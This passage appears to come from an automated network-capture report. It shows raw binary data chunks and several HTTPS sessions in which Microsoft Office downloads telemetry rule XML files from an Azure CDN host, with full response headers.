                                                                                                              2024-12-05 09:39:15 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                                              Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                                              2024-12-05 09:39:15 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                                              Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                                              2024-12-05 09:39:15 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                                              Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                                              2024-12-05 09:39:15 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                                              Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                                              2024-12-05 09:39:15 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                                              Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                                              2024-12-05 09:39:15 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                                              Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                                              Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                                              Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                                              Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                                              Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              144192.168.2.64988813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:15 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:16 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1409
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                              ETag: "0x8DC582BDFC438CF"
                                                                                                              x-ms-request-id: 82cf55be-b01e-0097-3aa1-464f33000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093916Z-1746fd949bddgsvjhC1EWRum2c00000002q0000000008gsu
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:16 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              145192.168.2.64988913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:16 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:16 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1372
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                              ETag: "0x8DC582BE6669CA7"
                                                                                                              x-ms-request-id: 00b569ce-a01e-000d-31cc-45d1ea000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093916Z-1746fd949bdlqd7fhC1EWR6vt000000002sg000000001gua
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:16 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              146192.168.2.64989013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:16 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:16 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1408
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE1038EF2"
                                                                                                              x-ms-request-id: 5188202c-b01e-003e-05cd-458e41000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093916Z-1746fd949bd6ztf6hC1EWRvq2s000000028g000000000t9n
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:16 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              147192.168.2.64989113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:16 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:16 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1371
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                              ETag: "0x8DC582BED3D048D"
                                                                                                              x-ms-request-id: 24400213-201e-005d-7ed2-45afb3000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093916Z-1746fd949bddgsvjhC1EWRum2c00000002u0000000003cf8
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:16 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              148192.168.2.64989213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:16 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:16 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1389
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE0F427E7"
                                                                                                              x-ms-request-id: d3851fcf-901e-007b-6bcc-45ac50000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093916Z-1746fd949bd77mkmhC1EWR5efc00000002pg0000000090ha
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:16 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              149192.168.2.64989313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:18 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
